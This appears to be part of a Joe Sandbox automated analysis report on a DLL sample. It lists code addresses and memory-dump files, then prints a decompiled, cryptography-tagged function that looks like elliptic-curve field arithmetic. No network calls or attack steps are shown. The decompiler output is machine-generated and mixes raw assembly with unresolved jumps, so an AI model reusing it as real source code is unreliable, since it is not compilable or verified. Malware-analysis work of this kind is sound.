0x7fef30607f3
0x7fef3060800
0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1dfe990be473bc2069ea95f5f339e7c5215355f3472806c5da07d7c5fd0d02b
Instruction ID: 33236b80149af53be7ac9493f21f11bcbc922e2b936255f6aeca8c6f73c474cd
Opcode Fuzzy Hash: d1dfe990be473bc2069ea95f5f339e7c5215355f3472806c5da07d7c5fd0d02b
Instruction Fuzzy Hash: 9262FA72B0C6968BE7988B19E4443BE77D2E384754F104237DA9E57BE8D63CE440EB40

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30EA420 Relevance: .7, Instructions: 740
COMMONCrypto

Download Yara Rule

C-Code - Quality: 46%

			E000007FE7FEF30EA420(signed int __eax, void* __eflags, long long __rbx, long long __rcx, void* __r8, void* __r9, void* __r10, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t452;
				signed int _t455;
				signed int _t458;
				signed int _t461;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t473;
				signed int _t476;
				signed int _t479;
				signed int _t482;
				signed int _t485;
				signed int _t488;
				signed int _t491;
				signed int _t494;
				signed int _t497;
				signed int _t500;
				signed int _t503;
				signed int _t506;
				signed int _t509;
				signed int _t746;
				signed int _t747;
				signed int _t751;
				signed int _t753;
				signed int _t755;
				signed int _t757;
				signed int _t759;
				signed int _t761;
				signed int _t763;
				signed int _t765;
				signed int _t767;
				signed int _t769;
				signed int _t771;
				signed int _t773;
				signed int _t775;
				signed int _t777;
				signed int _t779;
				signed int _t780;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t835;
				signed int _t837;
				signed int _t838;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t860;
				void* _t861;
				void* _t862;
				signed long long _t864;
				unsigned long long _t867;
				void* _t876;
				intOrPtr* _t892;
				void* _t902;
				void* _t904;
				void* _t906;
				intOrPtr* _t907;
				void* _t909;
				signed long long _t910;
				void* _t914;
				void* _t919;
				void* _t922;
				void* _t924;
				void* _t926;
				void* _t928;

				_t921 = __r11;
				_t920 = __r10;
				_t919 = __r9;
				_t869 = __rbx;
				_t862 = __eflags;
				 *((long long*)(_t909 + 0x20)) = __rbx;
				_t907 = _t909 - 0x170;
				_t910 = _t909 - 0x270;
				_t864 =  *0xf319c428; // 0x2fa980d671f5
				 *(_t907 + 0x168) = _t864 ^ _t910;
				asm("movups xmm1, [edx+0x10]");
				asm("movups xmm0, [edx]");
				_t867 =  *(__r8 + 0x18) >> 0x38;
				 *((long long*)(_t907 + 0x50)) = __rcx;
				asm("movups [ebp+0x158], xmm1");
				asm("inc ecx");
				asm("movups [ebp+0x148], xmm0");
				asm("inc ecx");
				asm("movups [ebp+0x68], xmm1");
				 *(_t907 + 0x77) = __eax & 0x0000007f;
				asm("movups [ebp+0x58], xmm0");
				E000007FE7FEF30EC6D0(_t867, __rbx, _t907 + 0x120, _t907 + 0x58, _t902, _t904, _t907, _t928, _t926);
				r9d =  *(_t907 + 0x120);
				asm("xorps xmm0, xmm0");
				r10d =  *(_t907 + 0x124);
				r11d =  *(_t907 + 0x128);
				_t843 =  *(_t907 + 0x12c);
				_t853 =  *(_t907 + 0x130);
				r14d =  *(_t907 + 0x134);
				_t15 = _t867 + 1; // 0x1
				_t827 = _t15;
				r15d =  *(_t907 + 0x138);
				r12d =  *(_t907 + 0x13c);
				r13d =  *(_t907 + 0x140);
				 *(_t907 + 0xc8) = _t867;
				 *(_t907 + 0xa0) = _t867;
				 *(_t910 + 0x20) =  *(_t907 + 0x144);
				 *(_t907 + 0x78) = _t867;
				 *(_t910 + 0x28) = 0;
				asm("movups [ebp+0xa8], xmm0");
				 *(_t910 + 0x24) = _t827;
				asm("movups [ebp+0xb8], xmm0");
				 *((intOrPtr*)(_t910 + 0x54)) = 0xfe;
				asm("movups [ebp+0x80], xmm0");
				asm("movups [ebp+0x90], xmm0");
				asm("movups [ebp+0x58], xmm0");
				asm("movups [ebp+0x68], xmm0");
				_t868 = _t867 >> 3;
				_t751 =  *(_t907 + 0xac);
				_t746 = ( *(_t907 + (_t867 >> 3) + 0x148) & 0x000000ff) >> 6 & 0x00000001;
				r8d = _t746;
				r8d = r8d ^  *(_t910 + 0x28);
				r8d =  ~r8d;
				_t452 = (r9d ^ _t827) & r8d;
				 *(_t910 + 0x28) = r8d;
				_t828 = _t827 ^ _t452;
				r9d = r9d ^ _t452;
				 *(_t910 + 0x2c) = _t828;
				 *(_t907 + 0xa8) = _t828;
				_t455 = (_t751 ^ r10d) & r8d;
				 *(_t910 + 0x30) = r9d;
				 *(_t907 + 0xd0) = r9d;
				r10d = r10d ^ _t455;
				 *(_t907 + 0xac) = _t751 ^ _t455;
				_t753 =  *(_t907 + 0xb0);
				 *(_t910 + 0x34) = r10d;
				_t458 = (_t753 ^ r11d) & r8d;
				 *(_t907 + 0xd4) = r10d;
				r11d = r11d ^ _t458;
				 *(_t907 + 0xb0) = _t753 ^ _t458;
				_t755 =  *(_t907 + 0xb4);
				 *(_t910 + 0x38) = r11d;
				_t461 = (_t755 ^ _t843) & r8d;
				 *(_t907 + 0xd8) = r11d;
				_t844 = _t843 ^ _t461;
				 *(_t907 + 0xb4) = _t755 ^ _t461;
				_t757 =  *(_t907 + 0xb8);
				 *(_t910 + 0x3c) = _t844;
				_t464 = (_t757 ^ _t853) & r8d;
				 *(_t907 + 0xdc) = _t844;
				_t854 = _t853 ^ _t464;
				 *(_t907 + 0xb8) = _t757 ^ _t464;
				_t759 =  *(_t907 + 0xbc);
				 *(_t910 + 0x40) = _t854;
				_t467 = (_t759 ^ r14d) & r8d;
				 *(_t907 + 0xe0) = _t854;
				r14d = r14d ^ _t467;
				 *(_t907 + 0xbc) = _t759 ^ _t467;
				_t761 =  *(_t907 + 0xc0);
				 *(_t910 + 0x44) = r14d;
				_t470 = (_t761 ^ r15d) & r8d;
				 *(_t907 + 0xe4) = r14d;
				r15d = r15d ^ _t470;
				 *(_t907 + 0xc0) = _t761 ^ _t470;
				_t763 =  *(_t907 + 0xc4);
				 *(_t910 + 0x48) = r15d;
				_t473 = (_t763 ^ r12d) & r8d;
				 *(_t907 + 0xe8) = r15d;
				 *(_t907 + 0xc4) = _t763 ^ _t473;
				r12d = r12d ^ _t473;
				_t765 =  *(_t907 + 0xc8);
				_t829 =  *(_t910 + 0x20);
				r15d =  *(_t907 + 0x90);
				_t476 = (_t765 ^ r13d) & r8d;
				_t855 =  *(_t907 + 0x94);
				r11d =  *(_t907 + 0x98);
				r13d = r13d ^ _t476;
				r14d =  *(_t907 + 0x70);
				 *(_t907 + 0xc8) = _t765 ^ _t476;
				_t767 =  *(_t907 + 0xcc);
				 *(_t910 + 0x50) = r13d;
				_t479 = (_t767 ^ _t829) & r8d;
				 *(_t907 + 0xf0) = r13d;
				r13d =  *(_t907 + 0x8c);
				_t830 = _t829 ^ _t479;
				 *(_t907 + 0xcc) = _t767 ^ _t479;
				_t769 =  *(_t907 + 0x80);
				 *(_t910 + 0x20) = _t830;
				 *(_t907 + 0xf4) = _t830;
				_t831 =  *(_t910 + 0x24);
				 *(_t910 + 0x4c) = r12d;
				_t482 = (_t831 ^ _t769) & r8d;
				 *(_t907 + 0xec) = r12d;
				r12d =  *(_t907 + 0x6c);
				_t832 = _t831 ^ _t482;
				 *(_t907 + 0x80) = _t769 ^ _t482;
				_t771 =  *(_t907 + 0x84);
				 *(_t910 + 0x24) = _t832;
				 *(_t907 + 0x58) = _t832;
				_t833 =  *(_t907 + 0x5c);
				_t485 = (_t771 ^ _t833) & r8d;
				 *(_t907 + 0x84) = _t771 ^ _t485;
				_t773 =  *(_t907 + 0x88);
				 *(_t907 + 0x5c) = _t833 ^ _t485;
				_t835 =  *(_t907 + 0x60);
				_t488 = (_t773 ^ _t835) & r8d;
				 *(_t907 + 0x88) = _t773 ^ _t488;
				_t775 =  *(_t907 + 0x64);
				_t491 = (r13d ^ _t775) & r8d;
				 *(_t907 + 0x60) = _t835 ^ _t488;
				r13d = r13d ^ _t491;
				 *(_t907 + 0x64) = _t775 ^ _t491;
				_t777 =  *(_t907 + 0x68);
				_t494 = (r15d ^ _t777) & r8d;
				 *(_t907 + 0x8c) = r13d;
				r15d = r15d ^ _t494;
				 *(_t907 + 0x90) = r15d;
				 *(_t907 + 0x68) = _t777 ^ _t494;
				_t497 = (_t855 ^ r12d) & r8d;
				_t856 = _t855 ^ _t497;
				r12d = r12d ^ _t497;
				 *(_t907 + 0x94) = _t856;
				 *(_t907 + 0x6c) = r12d;
				_t500 = (r11d ^ r14d) & r8d;
				r11d = r11d ^ _t500;
				r9d =  *(_t907 + 0x9c);
				r14d = r14d ^ _t500;
				_t845 =  *(_t907 + 0x74);
				_t837 =  *(_t907 + 0xa0);
				r10d =  *(_t907 + 0x78);
				_t503 = (r9d ^ _t845) & r8d;
				_t779 =  *(_t907 + 0xa4);
				r9d = r9d ^ _t503;
				 *(_t907 + 0x98) = r11d;
				_t846 = _t845 ^ _t503;
				 *(_t907 + 0x70) = r14d;
				 *(_t907 + 0x9c) = r9d;
				 *(_t907 + 0x74) = _t846;
				_t506 = (_t837 ^ r10d) & r8d;
				r8d =  *(_t907 + 0x7c);
				_t838 = _t837 ^ _t506;
				r10d = r10d ^ _t506;
				 *(_t907 + 0xa0) = _t838;
				 *(_t907 + 0x78) = r10d;
				_t509 = (_t779 ^ r8d) &  *(_t910 + 0x28);
				_t780 = _t779 ^ _t509;
				 *(_t910 + 0x28) = _t746;
				r8d = r8d ^ _t509;
				 *(_t907 + 0xa4) = _t780;
				 *(_t907 + 0x7c) = r8d;
				 *((intOrPtr*)(_t907 - 0x58)) =  *(_t910 + 0x30) -  *(_t910 + 0x24) + 0x7ffffda;
				 *((intOrPtr*)(_t907 - 0x54)) =  *(_t910 + 0x34) -  *(_t907 + 0x5c) + 0x3fffffe;
				 *((intOrPtr*)(_t907 - 0x50)) =  *(_t910 + 0x38) -  *(_t907 + 0x60) + 0x7fffffe;
				 *((intOrPtr*)(_t907 - 0x4c)) =  *(_t910 + 0x3c) -  *(_t907 + 0x64) + 0x3fffffe;
				 *((intOrPtr*)(_t907 - 0x48)) =  *(_t910 + 0x40) -  *(_t907 + 0x68) + 0x7fffffe;
				 *((intOrPtr*)(_t907 - 0x44)) =  *(_t910 + 0x44) - r12d + 0x3fffffe;
				 *((intOrPtr*)(_t907 - 0x40)) =  *(_t910 + 0x48) - r14d + 0x7fffffe;
				 *((intOrPtr*)(_t907 - 0x3c)) =  *(_t910 + 0x4c) - _t846 + 0x3fffffe;
				 *((intOrPtr*)(_t907 - 0x38)) =  *(_t910 + 0x50) - r10d + 0x7fffffe;
				 *((intOrPtr*)(_t907 - 0x34)) =  *(_t910 + 0x20) - r8d + 0x3fffffe;
				 *((intOrPtr*)(_t910 + 0x58)) =  *(_t910 + 0x2c) -  *(_t907 + 0x80) + 0x7ffffda;
				 *((intOrPtr*)(_t910 + 0x5c)) =  *(_t907 + 0xac) -  *(_t907 + 0x84) + 0x3fffffe;
				 *((intOrPtr*)(_t910 + 0x60)) =  *(_t907 + 0xb0) -  *(_t907 + 0x88) + 0x7fffffe;
				 *((intOrPtr*)(_t910 + 0x64)) =  *(_t907 + 0xb4) - r13d + 0x3fffffe;
				 *((intOrPtr*)(_t910 + 0x68)) =  *(_t907 + 0xb8) - r15d + 0x7fffffe;
				 *((intOrPtr*)(_t910 + 0x6c)) =  *(_t907 + 0xbc) - _t856 + 0x3fffffe;
				 *((intOrPtr*)(_t910 + 0x70)) =  *(_t907 + 0xc0) - r11d + 0x7fffffe;
				 *((intOrPtr*)(_t910 + 0x74)) =  *(_t907 + 0xc4) - r9d + 0x3fffffe;
				 *((intOrPtr*)(_t910 + 0x78)) =  *(_t907 + 0xc8) - _t838 + 0x7fffffe;
				 *((intOrPtr*)(_t910 + 0x7c)) =  *(_t907 + 0xcc) - _t780 + 0x3fffffe;
				 *_t907 =  *(_t907 + 0x80) +  *(_t910 + 0x2c);
				 *((intOrPtr*)(_t907 + 4)) =  *(_t907 + 0x84) +  *(_t907 + 0xac);
				 *((intOrPtr*)(_t907 + 8)) =  *(_t907 + 0x88) +  *(_t907 + 0xb0);
				 *((intOrPtr*)(_t907 + 0xc)) =  *(_t907 + 0xb4) + r13d;
				 *((intOrPtr*)(_t907 + 0x10)) =  *(_t907 + 0xb8) + r15d;
				 *((intOrPtr*)(_t907 + 0x14)) =  *(_t907 + 0xbc) + _t856;
				 *((intOrPtr*)(_t907 + 0x18)) =  *(_t907 + 0xc0) + r11d;
				 *((intOrPtr*)(_t907 + 0x1c)) =  *(_t907 + 0xc4) + r9d;
				 *((intOrPtr*)(_t907 + 0x20)) =  *(_t907 + 0xc8) + _t838;
				 *((intOrPtr*)(_t907 + 0x24)) =  *(_t907 + 0xcc) + _t780;
				 *(_t907 - 0x80) =  *(_t910 + 0x30) +  *(_t910 + 0x24);
				 *(_t907 - 0x7c) =  *(_t907 + 0x5c) +  *(_t910 + 0x34);
				 *((intOrPtr*)(_t907 - 0x78)) =  *(_t907 + 0x60) +  *(_t910 + 0x38);
				 *(_t907 - 0x74) =  *(_t907 + 0x64) +  *(_t910 + 0x3c);
				 *(_t907 - 0x70) =  *(_t907 + 0x68) +  *(_t910 + 0x40);
				 *((intOrPtr*)(_t907 - 0x6c)) =  *(_t910 + 0x44) + r12d;
				 *((intOrPtr*)(_t907 - 0x68)) =  *(_t910 + 0x48) + r14d;
				 *((intOrPtr*)(_t907 - 0x64)) =  *(_t910 + 0x4c) + _t846;
				 *((intOrPtr*)(_t907 - 0x60)) =  *(_t910 + 0x50) + r10d;
				 *((intOrPtr*)(_t907 - 0x5c)) =  *(_t910 + 0x20) + r8d;
				E000007FE7FEF30EBAF0(_t867 >> 3, _t907 + 0x58, _t907 - 0x58, _t907, __r9, __r10, __r11, _t924, _t922);
				_t914 = _t910 + 0x58;
				E000007FE7FEF30EBAF0(_t867 >> 3, _t907 + 0x80, _t907 - 0x80, _t914, __r9, __r10, __r11, _t902, _t904);
				E000007FE7FEF30EC270(_t868, _t907 - 0x28, _t910 + 0x58, _t914, __r10, __r11);
				_t892 = _t907;
				_t876 = _t907 + 0x28;
				E000007FE7FEF30EC270(_t868, _t876, _t892, _t914, __r10, __r11);
				r9d =  *(_t907 + 0x58);
				r10d =  *(_t907 + 0x5c);
				r8d =  *(_t907 + 0x88);
				r11d =  *(_t907 + 0x8c);
				r9d = r9d -  *(_t907 + 0x80);
				r14d =  *(_t907 + 0x64);
				r9d = r9d + 0x7ffffda;
				r12d =  *(_t907 + 0x68);
				 *(_t907 + 0xf8) = _t919 + _t876;
				 *(_t907 + 0xfc) = _t892 + __r10;
				r10d = r10d -  *(_t907 + 0x84);
				 *(_t907 - 0x80) = r9d;
				 *(_t907 + 0x100) = _t914 + _t902;
				r10d = r10d + 0x3fffffe;
				 *(_t907 + 0x104) = __r11 + _t926;
				r14d = r14d - r11d;
				 *(_t907 - 0x7c) = r10d;
				 *(_t907 + 0x108) = _t904 + _t922;
				r12d = r12d -  *(_t907 + 0x90);
				r14d = r14d + 0x3fffffe;
				 *(_t907 + 0x10c) =  *(_t907 + 0x6c) +  *(_t907 + 0x94);
				r12d = r12d + 0x7fffffe;
				 *(_t907 + 0x110) =  *(_t907 + 0x70) +  *(_t907 + 0x98);
				 *(_t907 + 0x114) =  *(_t907 + 0x9c) +  *(_t907 + 0x74);
				 *(_t907 + 0x118) =  *(_t907 + 0xa0) +  *(_t907 + 0x78);
				 *(_t907 + 0x11c) =  *(_t907 + 0xa4) +  *(_t907 + 0x7c);
				 *((intOrPtr*)(_t907 - 0x78)) =  *(_t907 + 0x60) - r8d + 0x7fffffe;
				 *((intOrPtr*)(_t907 - 0x6c)) =  *(_t907 + 0x6c) -  *(_t907 + 0x94) + 0x3fffffe;
				 *(_t907 - 0x74) = r14d;
				 *(_t907 - 0x70) = r12d;
				 *((intOrPtr*)(_t907 - 0x68)) =  *(_t907 + 0x70) -  *(_t907 + 0x98) + 0x7fffffe;
				 *((intOrPtr*)(_t907 - 0x64)) =  *(_t907 + 0x74) -  *(_t907 + 0x9c) + 0x3fffffe;
				 *((intOrPtr*)(_t907 - 0x60)) =  *(_t907 + 0x78) -  *(_t907 + 0xa0) + 0x7fffffe;
				 *((intOrPtr*)(_t907 - 0x5c)) =  *(_t907 + 0x7c) -  *(_t907 + 0xa4) + 0x3fffffe;
				E000007FE7FEF30EBAF0(_t868, _t907 + 0xa8, _t907 + 0x28, _t907 - 0x28, _t919, __r10, __r11);
				 *((intOrPtr*)(_t910 + 0x58)) =  *((intOrPtr*)(_t907 + 0x28)) -  *((intOrPtr*)(_t907 - 0x28)) + 0x7ffffda;
				 *((intOrPtr*)(_t910 + 0x5c)) =  *((intOrPtr*)(_t907 + 0x2c)) -  *((intOrPtr*)(_t907 - 0x24)) + 0x3fffffe;
				 *((intOrPtr*)(_t910 + 0x60)) =  *((intOrPtr*)(_t907 + 0x30)) -  *((intOrPtr*)(_t907 - 0x20)) + 0x7fffffe;
				 *((intOrPtr*)(_t910 + 0x64)) =  *((intOrPtr*)(_t907 + 0x34)) -  *((intOrPtr*)(_t907 - 0x1c)) + 0x3fffffe;
				 *((intOrPtr*)(_t910 + 0x68)) =  *((intOrPtr*)(_t907 + 0x38)) -  *((intOrPtr*)(_t907 - 0x18)) + 0x7fffffe;
				 *((intOrPtr*)(_t910 + 0x6c)) =  *((intOrPtr*)(_t907 + 0x3c)) -  *((intOrPtr*)(_t907 - 0x14)) + 0x3fffffe;
				 *((intOrPtr*)(_t910 + 0x70)) =  *((intOrPtr*)(_t907 + 0x40)) -  *((intOrPtr*)(_t907 - 0x10)) + 0x7fffffe;
				 *((intOrPtr*)(_t910 + 0x74)) =  *((intOrPtr*)(_t907 + 0x44)) -  *((intOrPtr*)(_t907 - 0xc)) + 0x3fffffe;
				 *((intOrPtr*)(_t910 + 0x78)) =  *((intOrPtr*)(_t907 + 0x48)) -  *((intOrPtr*)(_t907 - 8)) + 0x7fffffe;
				 *((intOrPtr*)(_t910 + 0x7c)) =  *((intOrPtr*)(_t907 + 0x4c)) -  *((intOrPtr*)(_t907 - 4)) + 0x3fffffe;
				E000007FE7FEF30EC270(_t868, _t907 + 0x80, _t907 - 0x80, _t907 - 0x28, __r10, __r11);
				E000007FE7FEF30EB600(_t746,  *(_t907 + 0x84),  *(_t907 + 0x60) - r8d + 0x7fffffe,  *(_t907 + 0x90), _t861, _t868, _t869, _t907 + 0x58, _t910 + 0x58, _t902, _t904, _t907);
				E000007FE7FEF30EC270(_t868, _t907 + 0xd0, _t907 + 0xf8, _t907 - 0x28, _t920, _t921);
				 *((intOrPtr*)(_t907 - 0x58)) =  *((intOrPtr*)(_t907 - 0x28)) +  *(_t907 + 0x58);
				 *((intOrPtr*)(_t907 - 0x54)) =  *((intOrPtr*)(_t907 - 0x24)) +  *(_t907 + 0x5c);
				 *((intOrPtr*)(_t907 - 0x50)) =  *((intOrPtr*)(_t907 - 0x20)) +  *(_t907 + 0x60);
				 *((intOrPtr*)(_t907 - 0x4c)) =  *((intOrPtr*)(_t907 - 0x1c)) +  *(_t907 + 0x64);
				 *((intOrPtr*)(_t907 - 0x48)) =  *(_t907 + 0x68) +  *((intOrPtr*)(_t907 - 0x18));
				 *((intOrPtr*)(_t907 - 0x44)) =  *(_t907 + 0x6c) +  *((intOrPtr*)(_t907 - 0x14));
				 *((intOrPtr*)(_t907 - 0x40)) =  *(_t907 + 0x70) +  *((intOrPtr*)(_t907 - 0x10));
				 *((intOrPtr*)(_t907 - 0x3c)) =  *(_t907 + 0x74) +  *((intOrPtr*)(_t907 - 0xc));
				 *((intOrPtr*)(_t907 - 0x38)) =  *(_t907 + 0x78) +  *((intOrPtr*)(_t907 - 8));
				 *((intOrPtr*)(_t907 - 0x34)) =  *(_t907 + 0x7c) +  *((intOrPtr*)(_t907 - 4));
				E000007FE7FEF30EBAF0(_t868, _t907 + 0x58, _t907 + 0x120, _t907 + 0x80, _t919, _t920, _t921);
				E000007FE7FEF30EBAF0(_t868, _t907 + 0x80, _t910 + 0x58, _t907 - 0x58, _t919, _t920, _t921);
				 *((intOrPtr*)(_t910 + 0x54)) =  *((intOrPtr*)(_t910 + 0x54)) - 1;
				if (_t862 < 0) goto 0xf30ead8c;
				r13d =  *(_t907 + 0xf0);
				r12d =  *(_t907 + 0xec);
				r15d =  *(_t907 + 0xe8);
				r14d =  *(_t907 + 0xe4);
				r11d =  *(_t907 + 0xd8);
				r10d =  *(_t907 + 0xd4);
				r9d =  *(_t907 + 0xd0);
				 *(_t910 + 0x20) =  *(_t907 + 0xf4);
				 *(_t910 + 0x24) =  *(_t907 + 0x58);
				goto 0xf30ea530;
				_t747 =  ~_t746;
				r15d =  *(_t907 + 0x80);
				r14d =  *(_t907 + 0x84);
				 *(_t907 + 0xa8) =  *(_t907 + 0xa8) ^ ( *(_t907 + 0xd0) ^  *(_t907 + 0xa8)) & _t747;
				 *(_t907 + 0xac) =  *(_t907 + 0xac) ^ ( *(_t907 + 0xac) ^  *(_t907 + 0xd4)) & _t747;
				 *(_t907 + 0xb0) =  *(_t907 + 0xb0) ^ ( *(_t907 + 0xb0) ^  *(_t907 + 0xd8)) & _t747;
				 *(_t907 + 0xb4) =  *(_t907 + 0xb4) ^ ( *(_t907 + 0xb4) ^  *(_t907 + 0xdc)) & _t747;
				 *(_t907 + 0xb8) =  *(_t907 + 0xb8) ^ ( *(_t907 + 0xb8) ^  *(_t907 + 0xe0)) & _t747;
				 *(_t907 + 0xbc) =  *(_t907 + 0xbc) ^ ( *(_t907 + 0xbc) ^  *(_t907 + 0xe4)) & _t747;
				 *(_t907 + 0xc0) =  *(_t907 + 0xc0) ^ ( *(_t907 + 0xc0) ^  *(_t907 + 0xe8)) & _t747;
				 *(_t907 + 0xc4) =  *(_t907 + 0xc4) ^ ( *(_t907 + 0xc4) ^  *(_t907 + 0xec)) & _t747;
				 *(_t907 + 0xc8) =  *(_t907 + 0xc8) ^ ( *(_t907 + 0xc8) ^  *(_t907 + 0xf0)) & _t747;
				 *(_t907 + 0xcc) =  *(_t907 + 0xcc) ^ ( *(_t907 + 0xcc) ^  *(_t907 + 0xf4)) & _t747;
				r15d = r15d ^ ( *(_t907 + 0x58) ^ r15d) & _t747;
				 *(_t907 + 0x80) = r15d;
				r14d = r14d ^ (r14d ^  *(_t907 + 0x5c)) & _t747;
				 *(_t907 + 0x84) = r14d;
				_t860 =  *(_t907 + 0x88) ^ ( *(_t907 + 0x88) ^  *(_t907 + 0x60)) & _t747;
				 *(_t907 + 0x88) = _t860;
				_t826 =  *(_t907 + 0x8c) ^ ( *(_t907 + 0x8c) ^  *(_t907 + 0x64)) & _t747;
				r11d =  *(_t907 + 0x94);
